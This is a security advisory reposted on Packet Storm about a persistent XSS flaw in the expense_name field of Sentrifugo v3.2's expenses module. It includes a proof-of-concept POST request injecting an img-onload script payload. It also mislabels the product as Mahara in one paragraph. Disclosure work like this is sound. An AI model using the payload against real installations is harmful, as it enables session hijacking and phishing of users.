Sentrifugo CMS 3.2 Cross Site Scripting

2020-05-07T00:00:00
ID PACKETSTORM:157592
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2020-05-07T00:00:00

Description

                                        
                                            `Document Title:  
===============  
Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability  
  
  
References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2229  
  
  
Release Date:  
=============  
2020-05-05  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
2229  
  
  
Common Vulnerability Scoring System:  
====================================  
4.6  
  
  
Vulnerability Class:  
====================  
Cross Site Scripting - Persistent  
  
  
Current Estimated Price:  
========================  
1.000€ - 2.000€  
  
  
Product & Service Introduction:  
===============================  
Sentrifugo is a FREE and powerful Human Resource Management System that  
can be easily configured to meet your organizational needs.  
Sentrifugo offers HR resource modules with exceptional features and an  
intuitive interface. It's easy to set up, configure and use.  
  
(Copy of the Homepage: http://www.sentrifugo.com/ &  
http://www.sentrifugo.com/download )  
  
  
Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a persistent  
cross site scripting vulnerability in the Sentrifugo v3.2 CMS.  
  
  
Affected Product(s):  
====================  
Sentrifugo  
Product: Sentrifugo v3.2 - CMS (Web-Application)  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2020-05-05: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Authentication Type:  
====================  
Restricted authentication (user/moderator) - User privileges  
  
  
User Interaction:  
=================  
Low User Interaction  
  
  
Disclosure Type:  
================  
Independent Security Research  
  
  
Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in  
the official Mahara v19.10.2 CMS web-application series.  
The vulnerability allows remote attackers to inject own malicious script  
codes with persistent attack vector to compromise browser  
to web-application requests from the application-side.  
  
The persistent vulnerability is located in the `expense_name` parameters  
of the `/expenses/expenses/edit` module in the `index.php` file.  
Remote attackers with low privileges are able to inject own malicious  
persistent script code as expenses entry. The injected code can  
be used to attack the frontend or backend of the web-application. The  
request method to inject is POST and the attack vector is located  
on the application-side. Entries of expenses can be reviewed in the  
backend by higher privileged accounts as well.  
  
Successful exploitation of the vulnerabilities results in session  
hijacking, persistent phishing attacks, persistent external redirects to  
malicious source and persistent manipulation of affected application  
modules.  
  
Request Method(s):  
[+] POST  
  
Vulnerable Module(s):  
[+] index.php/expenses/expenses/edit  
  
Vulnerable Input(s):  
[+] Expenses Name  
  
Vulnerable File(s):  
[+] index.php  
  
Vulnerable Parameter(s):  
[+] expense_name  
  
Affected Module(s):  
[+] index.php/expenses/expenses  
  
  
Proof of Concept (PoC):  
=======================  
The persistent web vulnerability can be exploited by low privileged web  
application user account with low user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
PoC: Vulnerable Source  
<div id="maincontentdiv">   
<div id="dialog-confirm" style="display:none;">  
<div class="newframe-div">  
<div class="new-form-ui height32">  
<div class="division">  
<input type="text" maxlength="12" id="number_value"  
name="number_value"></div>  
<span class="errors"  
id="errors-contactnumber"></span></div></div></div>   
<div id="empstatus-alert" style="display:none;">  
<div class="newframe-div"><div id="empstatusmessage"></div></div></div>  
<div id="empleaves-alert" style="display:none;">  
<div class="newframe-div"><div id="empleavesmessage"></div></div></div>   
  
  
--- PoC Session Logs [POST] --- (Expenses Inject)  
http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit  
Host: sentrifugo.localhost:8080  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 352  
Origin: http://sentrifugo.localhost:8080  
Connection: keep-alive  
Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit  
Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87;  
_ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443  
id=&limit=&offset=&parameter=all&currencyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=&  
expense_name=<img src="evil.source"  
onload=alert(document.domain)>&category_id=&project_id=&expense_date=&expense_currency_id=2&  
expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save  
-  
POST: HTTP/1.1 200 OK  
Server: Apache/2.2.22 (Ubuntu)  
X-Powered-By: PHP/5.3.10-1ubuntu3.10  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 19284  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
  
Reference(s):  
http://sentrifugo.localhost:8080/index.php  
http://sentrifugo.localhost:8080/index.php/expenses  
http://sentrifugo.localhost:8080/index.php/expenses/expenses/  
http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit  
  
  
Credits & Authors:  
==================  
Vulnerability-Lab -  
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab  
Benjamin Kunz Mejri -  
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without  
any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability  
and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct,  
indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been  
advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or  
incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies,  
deface websites, hack into databases or trade with stolen data.  
  
Domains: www.vulnerability-lab.com www.vuln-lab.com   
www.vulnerability-db.com  
Services: magazine.vulnerability-lab.com  
paste.vulnerability-db.com infosec.vulnerability-db.com  
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab   
youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php  
vulnerability-lab.com/rss/rss_upcoming.php  
vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php  
vulnerability-lab.com/register.php  
vulnerability-lab.com/list-of-bug-bounty-programs.php  
  
Any modified copy or reproduction, including partially usages, of this  
file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified  
form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers.  
All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the  
specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.  
  
Copyright © 2020 | Vulnerability Laboratory - [Evolution  
Security GmbH]™  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
`